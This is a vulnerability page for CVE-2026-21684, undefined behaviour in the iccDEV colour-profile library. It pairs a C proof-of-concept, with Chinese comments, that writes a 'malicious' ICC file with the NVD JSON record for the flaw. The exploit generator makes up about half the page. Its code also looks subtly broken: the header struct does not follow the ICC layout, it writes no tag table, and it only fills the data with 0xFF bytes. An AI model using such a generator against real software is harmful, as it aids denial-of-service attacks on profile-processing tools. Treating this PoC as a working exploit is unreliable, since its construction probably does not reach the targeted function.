CVE-2026-21684

// CVE-2026-21684 PoC - 恶意ICC配置文件构造示例 // 此PoC展示如何构造可能触发CIccTagSpectralViewingConditions()未定义行为的ICC文件 #include <stdio.h> #include <stdlib.h> #include <string.h> // ICC文件头结构 typedef struct { char signature[4]; // 'acsp' signature unsigned int reserved; unsigned short major_ver; unsigned short minor_ver; unsigned int profile_class; unsigned int color_space; unsigned int pcs; unsigned int creation_date[6]; unsigned int file_size; unsigned int tag_count; } ICC_Header; // 构造恶意ICC配置文件 void create_malicious_icc(const char* filename) { FILE* fp = fopen(filename, "wb"); if (!fp) return; // 构造ICC头部 ICC_Header header = {0}; memcpy(header.signature, "acsp", 4); header.major_ver = 4; header.minor_ver = 2; header.profile_class = 0x73636e72; // 'scnr' header.color_space = 0x58595A20; // 'XYZ ' header.pcs = 0x58595A20; // 'XYZ ' header.file_size = sizeof(ICC_Header) + 128; header.tag_count = 1; fwrite(&header, sizeof(ICC_Header), 1, fp); // 构造可能触发未定义行为的spectral viewing conditions数据 unsigned char malicious_data[128] = {0}; // 填充特定数据以触发CIccTagSpectralViewingConditions()中的未定义行为 memset(malicious_data, 0xFF, sizeof(malicious_data)); fwrite(malicious_data, sizeof(malicious_data), 1, fp); fclose(fp); } int main() { create_malicious_icc("CVE-2026-21684_malicious.icc"); printf("Malicious ICC profile created: CVE-2026-21684_malicious.icc\n"); return 0; }

{"cve": {"id": "CVE-2026-21684", "sourceIdentifier": "[email protected]", "published": "2026-01-07T22:15:44.480", "lastModified": "2026-01-12T18:05:19.040", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of International Color Consortium (ICC) color management profiles. Versions prior to 2.3.1.2 have Undefined Behavior in `CIccTagSpectralViewingConditions()`. This vulnerability affects users of the iccDEV library who process ICC color profiles. Version 2.3.1.2 contains a patch. No known workarounds are available."}, {"lang": "es", "value": "iccDEV proporciona un conjunto de bibliotecas y herramientas que permiten la interacción, manipulación y aplicación de perfiles de gestión de color del International Color Consortium (ICC). Las versiones anteriores a la 2.3.1.2 tienen Comportamiento Indefinido en 'CIccTagSpectralViewingConditions()'. Esta vulnerabilidad afecta a los usuarios de la biblioteca iccDEV que procesan perfiles de color ICC. La versión 2.3.1.2 contiene un parche. No se conocen soluciones alternativas disponibles."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-758"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.3.1.1", "matchCriteriaId": "0E50DFFC-9185-4969-85A7-6D3976699720"}]}]}], "references": [{"url": "https://github.com/InternationalColorConsortium/iccDEV/issues/216", "source": "[email protected]", "tags": ["Issue Tracking", "Exploit", "Vendor Advisory"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/pull/225", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-fg9m-j9x8-8279", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}